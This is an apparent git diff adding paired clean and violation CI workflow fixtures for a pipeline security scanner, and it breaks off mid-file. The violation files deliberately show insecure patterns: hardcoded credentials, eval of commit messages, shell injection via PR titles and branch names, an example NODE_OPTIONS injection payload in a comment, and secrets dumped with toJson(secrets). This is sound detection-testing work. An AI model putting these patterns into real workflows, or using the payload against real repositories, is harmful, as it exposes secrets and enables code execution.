diff --git a/policies/testdata/ISSUE-105/github/clean_secret_ref.yml b/policies/testdata/ISSUE-105/github/clean_secret_ref.yml
new file mode 100644
index 0000000..3d8a2f5
--- /dev/null
+++ b/policies/testdata/ISSUE-105/github/clean_secret_ref.yml
@@ -0,0 +1,15 @@
+# Password sourced from a repo/org secret β the value never lands in
+# the workflow YAML. Expected: 0 findings.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container:
+ image: ghcr.io/example/private:latest
+ credentials:
+ username: ${{ secrets.DOCKER_USERNAME }}
+ password: ${{ secrets.DOCKER_PASSWORD }}
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-105/github/violation_literal.yml b/policies/testdata/ISSUE-105/github/violation_literal.yml
new file mode 100644
index 0000000..95f6a87
--- /dev/null
+++ b/policies/testdata/ISSUE-105/github/violation_literal.yml
@@ -0,0 +1,16 @@
+# password is a string literal committed to git history. Anyone with
+# clone access can retrieve it; rotation requires history rewriting.
+# Expected: 1 finding on build.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container:
+ image: ghcr.io/example/private:latest
+ credentials:
+ username: myuser
+ password: hunter2
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-106/github/clean_ci_no_publish.yml b/policies/testdata/ISSUE-106/github/clean_ci_no_publish.yml
new file mode 100644
index 0000000..334965b
--- /dev/null
+++ b/policies/testdata/ISSUE-106/github/clean_ci_no_publish.yml
@@ -0,0 +1,15 @@
+# Plain CI workflow without any publish action: caching here is
+# intended and not release-relevant. Expected: 0 findings.
+name: CI
+on: [push]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-node@v4
+ with:
+ node-version: '20'
+ cache: 'npm'
+ - run: npm test
diff --git a/policies/testdata/ISSUE-106/github/clean_release_scoped_key.yml b/policies/testdata/ISSUE-106/github/clean_release_scoped_key.yml
new file mode 100644
index 0000000..77f8929
--- /dev/null
+++ b/policies/testdata/ISSUE-106/github/clean_release_scoped_key.yml
@@ -0,0 +1,15 @@
+# Release workflow but the cache key weaves github.ref_name β a PR
+# run can not populate the same key. Expected: 0 findings.
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/cache@v4
+ with:
+ key: release-${{ github.ref_name }}-${{ hashFiles('**/package-lock.json') }}
+ path: ~/.npm
+ - uses: JS-DevTools/npm-publish@v3
diff --git a/policies/testdata/ISSUE-106/github/violation_publish_action.yml b/policies/testdata/ISSUE-106/github/violation_publish_action.yml
new file mode 100644
index 0000000..7bdfd8d
--- /dev/null
+++ b/policies/testdata/ISSUE-106/github/violation_publish_action.yml
@@ -0,0 +1,16 @@
+# Push-triggered workflow invokes the pypa publish action β release
+# intent in a non-release trigger. Cache is un-scoped. Expected: 1.
+name: Build and Publish
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-python@v5
+ with:
+ python-version: '3.12'
+ cache: pip
+ - run: python -m build
+ - uses: pypa/gh-action-pypi-publish@v1
diff --git a/policies/testdata/ISSUE-106/github/violation_release_unkeyed.yml b/policies/testdata/ISSUE-106/github/violation_release_unkeyed.yml
new file mode 100644
index 0000000..076080d
--- /dev/null
+++ b/policies/testdata/ISSUE-106/github/violation_release_unkeyed.yml
@@ -0,0 +1,16 @@
+# Release workflow restores actions/cache with a key that does not
+# reference the release ref β a PR-populated entry on the same key
+# slides into the published build. Expected: 1 finding.
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/cache@v4
+ with:
+ key: deps-${{ hashFiles('**/package-lock.json') }}
+ path: ~/.npm
+ - uses: JS-DevTools/npm-publish@v3
diff --git a/policies/testdata/ISSUE-112/github/clean_cosign.yml b/policies/testdata/ISSUE-112/github/clean_cosign.yml
new file mode 100644
index 0000000..763a4c3
--- /dev/null
+++ b/policies/testdata/ISSUE-112/github/clean_cosign.yml
@@ -0,0 +1,20 @@
+# Same release but with cosign signing the artefacts. Expected: 0.
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ permissions:
+ id-token: write
+ contents: write
+ steps:
+ - uses: actions/checkout@v4
+ - uses: sigstore/cosign-installer@v3
+ - run: make dist
+ - run: cosign sign-blob --yes dist/release.tar.gz > dist/release.tar.gz.sig
+ - uses: softprops/action-gh-release@v2
+ with:
+ files: |
+ dist/release.tar.gz
+ dist/release.tar.gz.sig
diff --git a/policies/testdata/ISSUE-112/github/violation_release_unsigned.yml b/policies/testdata/ISSUE-112/github/violation_release_unsigned.yml
new file mode 100644
index 0000000..36ff0bd
--- /dev/null
+++ b/policies/testdata/ISSUE-112/github/violation_release_unsigned.yml
@@ -0,0 +1,14 @@
+# Release workflow uses softprops/action-gh-release but no signing
+# step. Expected: 1 finding on publish.
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: make dist
+ - uses: softprops/action-gh-release@v2
+ with:
+ files: dist/*
diff --git a/policies/testdata/ISSUE-115/github/clean.yml b/policies/testdata/ISSUE-115/github/clean.yml
new file mode 100644
index 0000000..20ec3d4
--- /dev/null
+++ b/policies/testdata/ISSUE-115/github/clean.yml
@@ -0,0 +1,18 @@
+# No superfluous action β gh pr create called directly. Expected: 0.
+name: Auto-PR
+on: [schedule]
+
+jobs:
+ open-pr:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: write
+ pull-requests: write
+ steps:
+ - uses: actions/checkout@v4
+ - run: |
+ echo "change" > NEW.md
+ git checkout -b automated
+ git commit -am "bump"
+ git push -u origin automated
+ gh pr create --title automated --body ""
diff --git a/policies/testdata/ISSUE-115/github/violation_peter_evans_pr.yml b/policies/testdata/ISSUE-115/github/violation_peter_evans_pr.yml
new file mode 100644
index 0000000..d5e123e
--- /dev/null
+++ b/policies/testdata/ISSUE-115/github/violation_peter_evans_pr.yml
@@ -0,0 +1,15 @@
+# peter-evans/create-pull-request adds a third-party dependency to
+# do what `gh pr create` already does from the runner. Expected: 1.
+name: Auto-PR
+on: [schedule]
+
+jobs:
+ open-pr:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: echo "change" > NEW.md
+ - uses: peter-evans/create-pull-request@v6
+ with:
+ title: automated
+ commit-message: bump
diff --git a/policies/testdata/ISSUE-203/gitlab/clean.gitlab-ci.yml b/policies/testdata/ISSUE-203/gitlab/clean.gitlab-ci.yml
new file mode 100644
index 0000000..3de002d
--- /dev/null
+++ b/policies/testdata/ISSUE-203/gitlab/clean.gitlab-ci.yml
@@ -0,0 +1,6 @@
+deploy:
+ image: alpine:3.19
+ variables:
+ DEPLOY_ENV: "prod"
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-203/gitlab/violation_debug_enabled.gitlab-ci.yml b/policies/testdata/ISSUE-203/gitlab/violation_debug_enabled.gitlab-ci.yml
new file mode 100644
index 0000000..f9298ed
--- /dev/null
+++ b/policies/testdata/ISSUE-203/gitlab/violation_debug_enabled.gitlab-ci.yml
@@ -0,0 +1,6 @@
+deploy:
+ image: alpine:3.19
+ variables:
+ CI_DEBUG_TRACE: "true"
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-204/gitlab/clean_echo.gitlab-ci.yml b/policies/testdata/ISSUE-204/gitlab/clean_echo.gitlab-ci.yml
new file mode 100644
index 0000000..482060c
--- /dev/null
+++ b/policies/testdata/ISSUE-204/gitlab/clean_echo.gitlab-ci.yml
@@ -0,0 +1,4 @@
+deploy:
+ image: alpine:3.19
+ script:
+ - echo "${CI_COMMIT_MESSAGE}"
diff --git a/policies/testdata/ISSUE-204/gitlab/violation_eval.gitlab-ci.yml b/policies/testdata/ISSUE-204/gitlab/violation_eval.gitlab-ci.yml
new file mode 100644
index 0000000..45deeaf
--- /dev/null
+++ b/policies/testdata/ISSUE-204/gitlab/violation_eval.gitlab-ci.yml
@@ -0,0 +1,4 @@
+deploy:
+ image: alpine:3.19
+ script:
+ - eval "${CI_COMMIT_MESSAGE}"
diff --git a/policies/testdata/ISSUE-205/gitlab/clean.gitlab-ci.yml b/policies/testdata/ISSUE-205/gitlab/clean.gitlab-ci.yml
new file mode 100644
index 0000000..3de002d
--- /dev/null
+++ b/policies/testdata/ISSUE-205/gitlab/clean.gitlab-ci.yml
@@ -0,0 +1,6 @@
+deploy:
+ image: alpine:3.19
+ variables:
+ DEPLOY_ENV: "prod"
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-205/gitlab/violation_override.gitlab-ci.yml b/policies/testdata/ISSUE-205/gitlab/violation_override.gitlab-ci.yml
new file mode 100644
index 0000000..fc56244
--- /dev/null
+++ b/policies/testdata/ISSUE-205/gitlab/violation_override.gitlab-ci.yml
@@ -0,0 +1,6 @@
+deploy:
+ image: alpine:3.19
+ variables:
+ PROD_TOKEN: "hardcoded-token"
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-206/github/clean_env_var.yml b/policies/testdata/ISSUE-206/github/clean_env_var.yml
new file mode 100644
index 0000000..2313690
--- /dev/null
+++ b/policies/testdata/ISSUE-206/github/clean_env_var.yml
@@ -0,0 +1,15 @@
+# Safe pattern: the template expression lands in env:, the shell
+# script reads it via "$TITLE". Shell variable expansion quotes the
+# value so injection payloads become literal arguments. Expected: 0
+# findings.
+name: Safe greeting
+on: pull_request
+
+jobs:
+ safe:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Greet safely
+ env:
+ TITLE: ${{ github.event.pull_request.title }}
+ run: echo "Welcome $TITLE"
diff --git a/policies/testdata/ISSUE-206/github/violation_head_ref.yml b/policies/testdata/ISSUE-206/github/violation_head_ref.yml
new file mode 100644
index 0000000..00462c2
--- /dev/null
+++ b/policies/testdata/ISSUE-206/github/violation_head_ref.yml
@@ -0,0 +1,13 @@
+# github.head_ref is the source branch name of a PR, attacker-
+# controlled for fork PRs. Interpolated directly, it is an injection
+# sink. Expected: 1 finding on bad.
+name: Injection via head_ref
+on: pull_request
+
+jobs:
+ bad:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo "Building branch ${{ github.head_ref }}"
+ make release
diff --git a/policies/testdata/ISSUE-206/github/violation_pr_title.yml b/policies/testdata/ISSUE-206/github/violation_pr_title.yml
new file mode 100644
index 0000000..ce8b80b
--- /dev/null
+++ b/policies/testdata/ISSUE-206/github/violation_pr_title.yml
@@ -0,0 +1,11 @@
+# PR title is user-controlled and pasted verbatim into a shell
+# command. Combined with pull_request_target the workflow token leaks
+# to the attacker. Expected: 1 finding on bad.
+name: Injection via PR title
+on: pull_request_target
+
+jobs:
+ bad:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "Welcome, reviewing ${{ github.event.pull_request.title }}"
diff --git a/policies/testdata/ISSUE-208/github/clean.yml b/policies/testdata/ISSUE-208/github/clean.yml
new file mode 100644
index 0000000..73dc1d9
--- /dev/null
+++ b/policies/testdata/ISSUE-208/github/clean.yml
@@ -0,0 +1,11 @@
+# Normal env vars, no deprecated-command override. Expected: 0 findings.
+name: Safe
+on: push
+
+jobs:
+ good:
+ runs-on: ubuntu-latest
+ env:
+ FOO: bar
+ steps:
+ - run: echo "ok"
diff --git a/policies/testdata/ISSUE-208/github/violation_enabled.yml b/policies/testdata/ISSUE-208/github/violation_enabled.yml
new file mode 100644
index 0000000..a2ec6d3
--- /dev/null
+++ b/policies/testdata/ISSUE-208/github/violation_enabled.yml
@@ -0,0 +1,12 @@
+# Job re-enables the deprecated `::set-env::` / `::add-path::` commands.
+# Expected: 1 finding on bad.
+name: Insecure
+on: push
+
+jobs:
+ bad:
+ runs-on: ubuntu-latest
+ env:
+ ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'
+ steps:
+ - run: echo "bad"
diff --git a/policies/testdata/ISSUE-209/github/clean_env_binding.yml b/policies/testdata/ISSUE-209/github/clean_env_binding.yml
new file mode 100644
index 0000000..8513f35
--- /dev/null
+++ b/policies/testdata/ISSUE-209/github/clean_env_binding.yml
@@ -0,0 +1,15 @@
+# Safe pattern: the PR title is bound through env: first, then the
+# sticky file is populated from the env var. Shell expansion quotes
+# the value, so injection payloads don't break out. Expected: 0.
+name: Preview
+on: [pull_request_target]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - env:
+ TITLE: ${{ github.event.pull_request.title }}
+ run: |
+ # The redirect sees "$TITLE", not the template literal.
+ echo "PR_TITLE=$TITLE" >> $GITHUB_ENV
diff --git a/policies/testdata/ISSUE-209/github/clean_literal.yml b/policies/testdata/ISSUE-209/github/clean_literal.yml
new file mode 100644
index 0000000..691ead4
--- /dev/null
+++ b/policies/testdata/ISSUE-209/github/clean_literal.yml
@@ -0,0 +1,11 @@
+# Writing a literal string into $GITHUB_ENV is fine β no user input
+# involved. Expected: 0 findings.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "BUILD_MODE=release" >> $GITHUB_ENV
+ - run: echo "/usr/local/custom/bin" >> $GITHUB_PATH
diff --git a/policies/testdata/ISSUE-209/github/violation_event_to_env.yml b/policies/testdata/ISSUE-209/github/violation_event_to_env.yml
new file mode 100644
index 0000000..381a38d
--- /dev/null
+++ b/policies/testdata/ISSUE-209/github/violation_event_to_env.yml
@@ -0,0 +1,11 @@
+# PR title written verbatim into $GITHUB_ENV. A PR titled
+# "; NODE_OPTIONS=--require=./exfil.js #
+# poisons subsequent Node invocations. Expected: 1 finding on build.
+name: Preview
+on: [pull_request_target]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "PR_TITLE=${{ github.event.pull_request.title }}" >> $GITHUB_ENV
diff --git a/policies/testdata/ISSUE-209/github/violation_head_ref_to_path.yml b/policies/testdata/ISSUE-209/github/violation_head_ref_to_path.yml
new file mode 100644
index 0000000..76d8d1a
--- /dev/null
+++ b/policies/testdata/ISSUE-209/github/violation_head_ref_to_path.yml
@@ -0,0 +1,11 @@
+# A fork branch name interpolated into $GITHUB_PATH. Any PATH-resolved
+# command after this step ("npm", "bash", ...) can be hijacked.
+# Expected: 1 finding on deploy.
+name: Deploy
+on: [pull_request_target]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "/tmp/${{ github.head_ref }}/bin" >> $GITHUB_PATH
diff --git a/policies/testdata/ISSUE-210/github/clean_branch_condition.yml b/policies/testdata/ISSUE-210/github/clean_branch_condition.yml
new file mode 100644
index 0000000..71bc652
--- /dev/null
+++ b/policies/testdata/ISSUE-210/github/clean_branch_condition.yml
@@ -0,0 +1,11 @@
+# If: gates on branch name (github.ref). Branches are tied to push
+# protections, not spoofable. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: github.ref == 'refs/heads/main'
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-210/github/violation_actor_dependabot.yml b/policies/testdata/ISSUE-210/github/violation_actor_dependabot.yml
new file mode 100644
index 0000000..5c726c0
--- /dev/null
+++ b/policies/testdata/ISSUE-210/github/violation_actor_dependabot.yml
@@ -0,0 +1,12 @@
+# Workflow gates the auto-merge on github.actor == dependabot[bot].
+# A forked account registered under that login satisfies the check
+# and gets the elevated path. Expected: 1 finding.
+name: Auto-merge Dependabot
+on: [pull_request_target]
+
+jobs:
+ merge:
+ runs-on: ubuntu-latest
+ if: github.actor == 'dependabot[bot]'
+ steps:
+ - run: gh pr merge --auto --squash "$PR_URL"
diff --git a/policies/testdata/ISSUE-210/github/violation_sender_login.yml b/policies/testdata/ISSUE-210/github/violation_sender_login.yml
new file mode 100644
index 0000000..e02d6d0
--- /dev/null
+++ b/policies/testdata/ISSUE-210/github/violation_sender_login.yml
@@ -0,0 +1,12 @@
+# Step-level if: gating on github.event.sender.login. Same spoofable
+# pattern, different field. Expected: 1 finding.
+name: Triage
+on: [issues]
+
+jobs:
+ label:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Bot-only label
+ if: github.event.sender.login == 'my-trusted-bot'
+ run: gh issue edit --add-label automated
diff --git a/policies/testdata/ISSUE-211/github/clean_normal_check.yml b/policies/testdata/ISSUE-211/github/clean_normal_check.yml
new file mode 100644
index 0000000..a563eb9
--- /dev/null
+++ b/policies/testdata/ISSUE-211/github/clean_normal_check.yml
@@ -0,0 +1,10 @@
+# Normal, sound if: condition. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: github.ref == 'refs/heads/main' && github.event_name == 'push'
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-211/github/violation_contradiction.yml b/policies/testdata/ISSUE-211/github/violation_contradiction.yml
new file mode 100644
index 0000000..c23e1e0
--- /dev/null
+++ b/policies/testdata/ISSUE-211/github/violation_contradiction.yml
@@ -0,0 +1,14 @@
+# `false &&` short-circuits to false β the step never runs, even
+# though the author seems to want to gate on the right operand.
+# Expected: 1 finding.
+name: Nightly
+on:
+ schedule:
+ - cron: '0 0 * * *'
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - if: false && github.event_name == 'schedule'
+ run: ./nightly-task.sh
diff --git a/policies/testdata/ISSUE-211/github/violation_tautology.yml b/policies/testdata/ISSUE-211/github/violation_tautology.yml
new file mode 100644
index 0000000..aa0ec01
--- /dev/null
+++ b/policies/testdata/ISSUE-211/github/violation_tautology.yml
@@ -0,0 +1,12 @@
+# `always() ||` short-circuits the whole OR β the right operand is
+# ignored, the job always runs regardless of the condition the author
+# thought they were adding. Expected: 1 finding.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: always() || github.ref == 'refs/heads/main'
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-212/github/clean_correct_order.yml b/policies/testdata/ISSUE-212/github/clean_correct_order.yml
new file mode 100644
index 0000000..9f5c8b2
--- /dev/null
+++ b/policies/testdata/ISSUE-212/github/clean_correct_order.yml
@@ -0,0 +1,11 @@
+# contains(github.ref, 'refs/heads/main') β ref is the haystack,
+# branch the needle. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: contains(github.ref, 'refs/heads/main')
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-212/github/clean_fromJSON_set.yml b/policies/testdata/ISSUE-212/github/clean_fromJSON_set.yml
new file mode 100644
index 0000000..420a20c
--- /dev/null
+++ b/policies/testdata/ISSUE-212/github/clean_fromJSON_set.yml
@@ -0,0 +1,11 @@
+# Explicit set via fromJSON β canonical safe form for a list of
+# allowed values. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: contains(fromJSON('["main", "release", "staging"]'), github.ref_name)
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-212/github/violation_inverted.yml b/policies/testdata/ISSUE-212/github/violation_inverted.yml
new file mode 100644
index 0000000..4a130c5
--- /dev/null
+++ b/policies/testdata/ISSUE-212/github/violation_inverted.yml
@@ -0,0 +1,12 @@
+# contains('main', github.ref) never matches β 'main' does not
+# contain 'refs/heads/main'. The gate never fires on main. Author
+# meant contains(github.ref, 'main') or similar. Expected: 1.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: contains('main', github.ref)
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-213/github/clean.yml b/policies/testdata/ISSUE-213/github/clean.yml
new file mode 100644
index 0000000..87000f9
--- /dev/null
+++ b/policies/testdata/ISSUE-213/github/clean.yml
@@ -0,0 +1,11 @@
+# Specific field extracted into an env binding β safe. Expected: 0.
+name: PR Telemetry
+on: [pull_request_target]
+
+jobs:
+ report:
+ runs-on: ubuntu-latest
+ env:
+ PR_NUMBER: ${{ github.event.pull_request.number }}
+ steps:
+ - run: echo "PR number: $PR_NUMBER"
diff --git a/policies/testdata/ISSUE-213/github/violation_tojson_github_event.yml b/policies/testdata/ISSUE-213/github/violation_tojson_github_event.yml
new file mode 100644
index 0000000..ba9ee70
--- /dev/null
+++ b/policies/testdata/ISSUE-213/github/violation_tojson_github_event.yml
@@ -0,0 +1,12 @@
+# toJson(github.event) serialised into an env var β any downstream
+# consumer sees every user-controllable field. Expected: 1 finding.
+name: PR Telemetry
+on: [pull_request_target]
+
+jobs:
+ report:
+ runs-on: ubuntu-latest
+ env:
+ PAYLOAD: ${{ toJson(github.event) }}
+ steps:
+ - run: echo "$PAYLOAD" > /tmp/event.json
diff --git a/policies/testdata/ISSUE-214/github/clean.yml b/policies/testdata/ISSUE-214/github/clean.yml
new file mode 100644
index 0000000..62ce26d
--- /dev/null
+++ b/policies/testdata/ISSUE-214/github/clean.yml
@@ -0,0 +1,12 @@
+# Pinned version + lockfile install. Expected: 0 findings.
+name: Test
+on: [push]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: pip install -r requirements.txt
+ - run: npm ci
+ - run: pip install 'pytest==8.3.3'
diff --git a/policies/testdata/ISSUE-214/github/violation_pip_unpinned.yml b/policies/testdata/ISSUE-214/github/violation_pip_unpinned.yml
new file mode 100644
index 0000000..140f0c0
--- /dev/null
+++ b/policies/testdata/ISSUE-214/github/violation_pip_unpinned.yml
@@ -0,0 +1,12 @@
+# `pip install requests` without a version or requirements file.
+# Expected: 1 finding on test.
+name: Test
+on: [push]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: pip install requests
+ - run: pytest
diff --git a/policies/testdata/ISSUE-215/github/clean_env_binding.yml b/policies/testdata/ISSUE-215/github/clean_env_binding.yml
new file mode 100644
index 0000000..8d4467d
--- /dev/null
+++ b/policies/testdata/ISSUE-215/github/clean_env_binding.yml
@@ -0,0 +1,13 @@
+# Canonical fix: bind vars.REGISTRY via env: then dereference $REGISTRY
+# in the shell. Expected: 0 findings.
+name: Login
+on: [push]
+
+jobs:
+ login:
+ runs-on: ubuntu-latest
+ steps:
+ - env:
+ REGISTRY: ${{ vars.REGISTRY }}
+ TOKEN: ${{ secrets.TOKEN }}
+ run: docker login "$REGISTRY" -u admin -p "$TOKEN"
diff --git a/policies/testdata/ISSUE-215/github/violation_inputs_reusable.yml b/policies/testdata/ISSUE-215/github/violation_inputs_reusable.yml
new file mode 100644
index 0000000..9f256dd
--- /dev/null
+++ b/policies/testdata/ISSUE-215/github/violation_inputs_reusable.yml
@@ -0,0 +1,16 @@
+# Reusable workflow that runs `make ${{ inputs.test-command }}`.
+# A caller that proxies github.event.* into test-command flips the
+# surface to PR-author-controlled. Expected: 1 finding on run.
+name: Acceptance tests
+on:
+ workflow_call:
+ inputs:
+ test-command:
+ type: string
+ required: true
+
+jobs:
+ run:
+ runs-on: ubuntu-latest
+ steps:
+ - run: make ${{ inputs.test-command }}
diff --git a/policies/testdata/ISSUE-215/github/violation_vars_docker_login.yml b/policies/testdata/ISSUE-215/github/violation_vars_docker_login.yml
new file mode 100644
index 0000000..990e9ab
--- /dev/null
+++ b/policies/testdata/ISSUE-215/github/violation_vars_docker_login.yml
@@ -0,0 +1,11 @@
+# `vars.REGISTRY` inlined into a docker login script. If an org-level
+# variable is misconfigured or a maintainer account is compromised,
+# the template expands arbitrary shell. Expected: 1 finding.
+name: Login
+on: [push]
+
+jobs:
+ login:
+ runs-on: ubuntu-latest
+ steps:
+ - run: docker login ${{ vars.REGISTRY }} -u admin -p ${{ secrets.TOKEN }}
diff --git a/policies/testdata/ISSUE-301/github/clean_scoped.yml b/policies/testdata/ISSUE-301/github/clean_scoped.yml
new file mode 100644
index 0000000..1bd9675
--- /dev/null
+++ b/policies/testdata/ISSUE-301/github/clean_scoped.yml
@@ -0,0 +1,14 @@
+# Each step names only the secrets it actually needs. This is the
+# intended pattern β no finding expected.
+name: Publish
+on: [push]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ env:
+ NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+ steps:
+ - run: npm publish
+ env:
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/policies/testdata/ISSUE-301/github/violation_env.yml b/policies/testdata/ISSUE-301/github/violation_env.yml
new file mode 100644
index 0000000..f6bcfcc
--- /dev/null
+++ b/policies/testdata/ISSUE-301/github/violation_env.yml
@@ -0,0 +1,13 @@
+# Entire secrets context serialised into an env var. Any downstream
+# command or third-party action that reads SECRETS_JSON sees every
+# secret the job has access to. Expected: 1 finding on call.
+name: Call Reusable
+on: [push]
+
+jobs:
+ call:
+ runs-on: ubuntu-latest
+ env:
+ SECRETS_JSON: ${{ toJson(secrets) }}
+ steps:
+ - run: echo "$SECRETS_JSON" | ./upload
diff --git a/policies/testdata/ISSUE-301/github/violation_run_script.yml b/policies/testdata/ISSUE-301/github/violation_run_script.yml
new file mode 100644
index 0000000..7ed4e0e
--- /dev/null
+++ b/policies/testdata/ISSUE-301/github/violation_run_script.yml
@@ -0,0 +1,11 @@
+# toJson(secrets) interpolated directly in a run: shell command.
+# Expected: 1 finding on dump.
+name: Dump
+on: [push]
+
+jobs:
+ dump:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo '${{ toJson(secrets) }}' > /tmp/payload.json
diff --git a/policies/testdata/ISSUE-301/github/violation_with.yml b/policies/testdata/ISSUE-301/github/violation_with.yml
new file mode 100644
index 0000000..82eb120
--- /dev/null
+++ b/policies/testdata/ISSUE-301/github/violation_with.yml
@@ -0,0 +1,14 @@
+# Third-party action receives every secret through its with: block.
+# Once the action runs, the whole set is visible to upstream code.
+# Expected: 1 finding on deploy.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: some/deployer@v1
+ with:
+ credentials: ${{ toJson(secrets) }}
+ target: prod
diff --git a/policies/testdata/ISSUE-302/github/clean_named.yml b/policies/testdata/ISSUE-302/github/clean_named.yml
new file mode 100644
index 0000000..344596c
--- /dev/null
+++ b/policies/testdata/ISSUE-302/github/clean_named.yml
@@ -0,0 +1,10 @@
+# Same reusable workflow, but each secret is named explicitly.
+# Expected: 0 findings.
+name: Call
+on: [push]
+
+jobs:
+ call:
+ uses: acme/shared/.github/workflows/publish.yml@v1
+ secrets:
+ NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
diff --git a/policies/testdata/ISSUE-302/github/clean_regular_job.yml b/policies/testdata/ISSUE-302/github/clean_regular_job.yml
new file mode 100644
index 0000000..d4bcb25
--- /dev/null
+++ b/policies/testdata/ISSUE-302/github/clean_regular_job.yml
@@ -0,0 +1,10 @@
+# A regular job (runs-on + steps). No reusable-workflow call here,
+# and no secrets context exposed. Expected: 0 findings.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-302/github/violation_inherit.yml b/policies/testdata/ISSUE-302/github/violation_inherit.yml
new file mode 100644
index 0000000..d28cc27
--- /dev/null
+++ b/policies/testdata/ISSUE-302/github/violation_inherit.yml
@@ -0,0 +1,11 @@
+# Reusable workflow called with secrets: inherit β every caller
+# secret is forwarded. If the reusable workflow is compromised
+# (upstream maintainer, tag retag), it sees the full set.
+# Expected: 1 finding on call.
+name: Call
+on: [push]
+
+jobs:
+ call:
+ uses: acme/shared/.github/workflows/publish.yml@v1
+ secrets: inherit
diff --git a/policies/testdata/ISSUE-303/github/clean_scoped.yml b/policies/testdata/ISSUE-303/github/clean_scoped.yml
new file mode 100644
index 0000000..25049fb
--- /dev/null
+++ b/policies/testdata/ISSUE-303/github/clean_scoped.yml
@@ -0,0 +1,13 @@
+# Individual secrets named directly β GitHub still knows every value
+# and masks logs. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ env:
+ API_TOKEN: ${{ secrets.API_TOKEN }}
+ API_USER: ${{ secrets.API_USER }}
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-303/github/violation_env.yml b/policies/testdata/ISSUE-303/github/violation_env.yml
new file mode 100644
index 0000000..daa408a
--- /dev/null
+++ b/policies/testdata/ISSUE-303/github/violation_env.yml
@@ -0,0 +1,13 @@
+# fromJSON(secrets.CREDS).token dereferenced in an env: binding.
+# After fromJSON runs, `token` is a fresh string GitHub does not
+# recognise as a secret β log redaction bypassed. Expected: 1 finding.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ env:
+ API_TOKEN: ${{ fromJSON(secrets.CREDS).token }}
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-303/github/violation_run.yml b/policies/testdata/ISSUE-303/github/violation_run.yml
new file mode 100644
index 0000000..1006614
--- /dev/null
+++ b/policies/testdata/ISSUE-303/github/violation_run.yml
@@ -0,0 +1,10 @@
+# fromJson (camelCase) on secrets with a .field projection inside a
+# run: script. Expected: 1 finding.
+name: Notify
+on: [push]
+
+jobs:
+ notify:
+ runs-on: ubuntu-latest
+ steps:
+ - run: curl -H "X-Token ${{ fromJson(secrets.BLOB).apiKey }}" https://example
diff --git a/policies/testdata/ISSUE-304/github/clean_job_perms.yml b/policies/testdata/ISSUE-304/github/clean_job_perms.yml
new file mode 100644
